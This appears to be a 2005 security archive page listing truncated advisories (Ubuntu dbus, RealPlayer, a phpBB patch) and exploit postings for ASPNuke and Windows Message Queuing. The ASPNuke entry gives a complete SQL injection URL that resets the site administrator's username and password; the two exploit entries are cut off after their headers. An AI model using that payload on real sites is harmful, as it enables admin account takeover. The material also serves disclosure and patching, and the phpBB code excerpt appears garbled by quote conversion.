Entries from June 2005

dbus vulnerability

Date June 30, 2005

===========================================================
Ubuntu Security Notice USN-144-1 June 27, 2005
dbus vulnerability
CAN-2005-0201
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
The following packages are affected:
dbus-1
The problem can be corrected by upgrading the affected package to
version 0.22-1ubuntu2.1. You have to restart your Gnome session (i.e.
log [...]

aspnuke is vulnerable to sql injection

Date June 30, 2005

*******description*********
aspnuke is a web portal system written in ASP.
site : www.aspnuke.com
********POC************
It’s possible to inject http://host/module/article/article/article.asp?articleid=1′
For example, you can change the admin username and password with this query:
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password=’bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c’ , username=’trapset’%20where%20userID=1%20–
This will change both username and password to trapset,
and then you can log in to the admin’s control panel from www.example.com/module/admin
********************
Remember, aspnuke is quite different from asp-nuke.
********************

This [...]

High Risk Vulnerability in RealPlayer for Windows

Date June 30, 2005

John Heasman of NGSSoftware has discovered a high risk vulnerability in
RealPlayer for Windows.
Versions affected include:
RealPlayer 10.5 (6.0.12.1040-1069)
RealPlayer 10
RealOne Player v2
RealOne Player v1
RealPlayer 10.5 (6.0.12.1212) is NOT affected.
The flaw permits the overwriting of a local file or execution of an ActiveX
control via a malformed MP3 file.
The patch can be downloaded from
http://service.real.com/help/faq/security/050623_player/EN/
NGSSoftware are going to withhold details [...]

phpBB 2.0.16 released

Date June 30, 2005

Hi everyone,
phpBB Group announces the release of phpBB 2.0.16. This release addresses
some bugfixes and one critical security issue. To fix this, please apply
the following change: In viewtopic.php
Find:
$message = str_replace(‘”‘, ‘”‘,
substr(@preg_replace(‘#(>(((?>([^>< ]+|(?R)))*)’ . $message . ‘< '), 1, -1));
Replace with:
$message = str_replace('"', '"',
substr(@preg_replace('#(>(((?>([^>< ]+|(?R)))*)’ . $message .
‘< ‘), 1, -1));
We urge you to update [...]

SQL Injection Exploit for ASPNuke <= 0.80

Date June 30, 2005

#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <= 0.80
# This exploit retrieve the username of the administrator of the board and his password crypted in SHA256
# Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print "\n\t===============================\n";
print "\t= Exploit for ASPNuke

Message Queuing Buffer Overflow Universal Exploit

Date June 30, 2005

/* HOD-ms05017-msmq-expl.c: 2005-06-28: PUBLIC v.0.3
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-017) Message Queuing Buffer Overflow Vulnerability
* Universal Exploit
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems [...]